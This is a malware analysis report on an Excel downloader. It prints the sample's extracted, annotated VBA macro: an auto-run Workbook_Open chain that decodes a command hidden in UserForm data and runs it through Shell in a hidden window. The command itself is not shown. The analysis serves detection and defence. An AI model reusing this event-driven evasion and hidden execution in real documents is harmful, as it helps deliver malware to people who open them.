Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 590259401da43fb5…

MALICIOUS

Office (OLE)

52.0 KB Created: 2018-10-16 16:44:32 Authoring application: Microsoft Excel First seen: 2019-04-18
MD5: 353d74e3b6dca388ef461afa0b50edb6 SHA-1: d4113049a7bca22ecb36333c03e7c0d7e9fde34e SHA-256: 590259401da43fb5152df9e6a63505de68e4c47d6583f6280bff96e1e311c4d0
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

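The file is an Excel document containing a Workbook_Open VBA macro, a common technique for executing malicious code automatically when the document is opened. The ClamAV detection name classifies it as a downloader, suggesting it is designed to fetch and execute additional payloads. The VBA macro is the primary mechanism for this execution: in the extracted source below, Workbook_Open writes to a control on the dialog1 UserForm, the form's Change-event handlers decode a string held in the form's controls, and the result is passed to Shell with a hidden window. The encoded command and its decoding alphabet are stored in the form data, not in the macro source, so the command itself does not appear in the script preview.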

Heuristics 3

  • ClamAV: Doc.Downloader.00536d-6755246-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6755246-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3670 bytes
SHA-256: 92b879f1bef319e8e253b4f48f024ac352580560ad99eef3f3b5f634924f60fb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-run entry point: Excel calls Workbook_Open when the workbook is opened
' with macros enabled (the OLE_VBA_WBOPEN finding in this report).
' It does no work itself; it passes the constant "2410" to start_main_dialog1,
' which writes it into a control on the dialog1 UserForm.
' NOTE(review): in the code shown, "2410" is never read again, so the write
' appears to exist only to fire the form's Change-event chain - confirm
' against the form data.
Sub Workbook_Open()
s1 = "2410"
start_main_dialog1 s1
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "dialog1"
Attribute VB_Base = "0{D4C5605C-74E4-430D-9758-CD27AF03860E}{AC8D0F7F-F6FB-4E42-960A-740F2A154DCB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Empty handler: contains no statements, so it takes no part in the
' execution chain visible in this listing.
Private Sub CommandButton1_Click()

End Sub

' Empty handler: contains no statements, so it takes no part in the
' execution chain visible in this listing.
Private Sub CommandButton2_Click()

End Sub

' Empty handler: contains no statements, so it takes no part in the
' execution chain visible in this listing.
Private Sub ComboBox1_Change()

End Sub

' Runs when dialog1.EditText1 changes (replaceCharsInLeter assigns to it).
' The body only stores a constant in a local variable that is never read,
' so this handler has no effect on the decode/execute chain.
Private Sub EditText1_Change()
Dim ind1 As String
' Dead store: ind1 is local to this handler and is not used afterwards.
ind1 = "1006"
End Sub

' Second link in the chain: runs when dialog1.TextBox1 changes, which
' start_main_dialog1 causes by assigning to that control from Workbook_Open.
' Its only action is to start the decode step in replaceCharsInLeter.
' Analyst note: control flow is carried by form events rather than direct
' calls, so a call-graph built from Workbook_Open alone stops at the
' assignment in start_main_dialog1.
Private Sub TextBox1_Change()
replaceCharsInLeter
End Sub

' Final event link: runs when dialog1.LastText changes (replaceCharsInLeter
' copies the decoded string into it). It measures the length of the decoded
' text and passes that length to replaceCharsInLeter2, which holds the
' Shell call.
Private Sub LastText_Change()
' lev2 and fh are assigned but not read anywhere in this handler (filler).
lev2 = "03"
' Length of the decoded string currently held in the LastText control.
lev1 = Len(dialog1.LastText)
fh = "04"
replaceCharsInLeter2 lev1
End Sub

' Empty handler for the date1 control. The control itself matters:
' replaceCharsInLeter reads dialog1.date1 as the encoded input.
Private Sub date1_Change()

End Sub

' Empty handler: contains no statements, so it takes no part in the
' execution chain visible in this listing.
Private Sub TextBox2_Change()

End Sub

Attribute VB_Name = "Module1"
' Decoder entry point.
'   Cell1 - the encoded text (called with dialog1.date1 by replaceCharsInLeter).
'   op    - ByRef output; reset to "" here and filled with the decoded text.
' Starts the recursive per-character decode in replaceChars at position 1.
Sub chars_replace(Cell1, ByRef op)
st1 = 1
op = ""
replaceChars st1, op, Cell1
End Sub

' Recursive decode loop: handles one character of `later` per call.
'   pointA - ByRef 1-based position of the character being decoded.
'   need   - ByRef accumulator for the decoded output.
'   later  - the encoded input string.
' For each character it looks up the character's position in the alphabet
' held in dialog1.Text1 and appends the alphabet character two positions
' earlier, wrapping at the start (see dial_pivot). This is a fixed-shift
' substitution over an alphabet stored in the form, not in this source.
' Recursion ends once pointA passes the end of `later`.
Sub replaceChars(ByRef pointA, ByRef need, later)
f_str = Len(later)
If pointA <= f_str Then
ch = ""
' ch receives the character at position pointA of the input.
fine later, pointA, ch
idial = 1
' idial receives the position of ch in dialog1.Text1, or 0 if not found.
dial_total_price ch, idial
st = ""
' Shift by -2; an expression is passed, so dial_pivot cannot modify idial.
dial_pivot idial - 2, st
need = need + st
pointA = pointA + 1
replaceChars pointA, need, later
End If
End Sub

' Decode step, called from TextBox1_Change.
' Decodes the content of dialog1.date1 into `level`, then writes the result
' to EditText1 and copies it on to LastText. Each assignment fires that
' control's Change handler; LastText_Change is the one that leads to Shell.
' Analyst note: the encoded input (date1) and the alphabet (Text1) are
' UserForm control values, so the decoded command is not recoverable from
' this macro source alone - the form's stored data is needed as well.
Sub replaceCharsInLeter()
Dim level As String
chars_replace dialog1.date1, level
dialog1.EditText1 = level
dialog1.LastText = dialog1.EditText1
End Sub


' Trigger helper called from Workbook_Open.
' Assigns string1 to dialog1.TextBox1. dialog1 is declared with
' VB_PredeclaredId = True, so referring to it by name uses the form's default
' instance without an explicit Load/Show. The assignment changes the control
' value, which runs TextBox1_Change and so starts the decode chain.
Sub start_main_dialog1(string1)
dialog1.TextBox1 = string1
End Sub

' Recursive linear search for a character in the alphabet dialog1.Text1.
'   b1                - ByRef 1-based position currently being tested.
'   control           - ByRef result; set to the matching position when found,
'                       otherwise left as the caller set it (0 in dial_total_price).
'   ActiveCellInTable - the single character to look for.
' The test is b1 < Len(Text1), so the last alphabet position is never
' compared; a character found only there is reported as not found (0).
Sub dial_scrub_multi(ByRef b1, ByRef control, ActiveCellInTable)
' The initial value 1 is overwritten on the next line (filler).
log2 = 1
log2 = Len(dialog1.Text1)
If b1 < log2 Then
b = ""
' b receives the alphabet character at position b1.
fine dialog1.Text1, b1, b
If ActiveCellInTable <> b Then
b1 = b1 + 1
dial_scrub_multi b1, control, ActiveCellInTable
Else
control = b1
End If
End If
End Sub

' Character accessor used throughout the decoder.
'   ARG1      - source string.
'   pointB    - 1-based position.
'   state_min - ByRef output; receives the last character of Left(ARG1, pointB),
'               i.e. the character at position pointB when 1 <= pointB <= Len(ARG1).
' Built from Left/Right rather than Mid; the "" + s1 concatenation does not
' change the value.
Sub fine(ARG1, pointB, ByRef state_min)
s1 = Left(ARG1, pointB)
s1 = "" + s1
state_min = Right(s1, 1)
End Sub


' Execution sink: the only place in this listing that starts a process.
'   i - length of the decoded string, passed in by LastText_Change.
' Shell is called only when i equals 429. At that value the second argument
' i - 4 * 105 - 9 evaluates to 0, which is the vbHide window style, so the
' decoded command in dialog1.LastText is launched without a visible window.
' NOTE(review): the exact-length gate presumably acts as a check that the
' form data decoded as intended; if the form content is altered so that the
' length differs, nothing is executed.
' Detection note: the Shell call has no literal command and no literal
' window style, so keyword matching on the command text will not fire here;
' the Shell call reachable from Workbook_Open via form events is the
' behaviour to look for.
Sub replaceCharsInLeter2(i)
With dialog1
If 429 - i = 0 Then Shell .LastText, i - 4 * 105 - 9
End With
End Sub

' Lookup wrapper: finds the position of character addper4 in dialog1.Text1.
'   addper4 - the character to look up.
'   ARG2    - ByRef result; preset to 0 and set by dial_scrub_multi to the
'             1-based position when the character is found.
Sub dial_total_price(addper4, ByRef ARG2)
ARG2 = 0
sub2 = 1
dial_scrub_multi sub2, ARG2, addper4
End Sub
  
' Returns the alphabet character for an already-shifted position.
'   pointer   - position in dialog1.Text1 after the -2 shift (may be <= 0).
'   state_max - ByRef output; receives the selected alphabet character.
' Positions below 1 wrap around by adding Len(Text1), so 0 selects the last
' character, -1 the one before it, and -2 (the "not found" case, 0 - 2) the
' third from the end.
Sub dial_pivot(pointer, ByRef state_max)
state_max = ""
' No-op: assigns -1 to pointer only when it is already -1 (filler).
If pointer = -1 Then
pointer = -1
End If
If pointer < 1 Then
fine dialog1.Text1, Len(dialog1.Text1) + pointer, state_max
Else
fine dialog1.Text1, pointer, state_max
End If
End Sub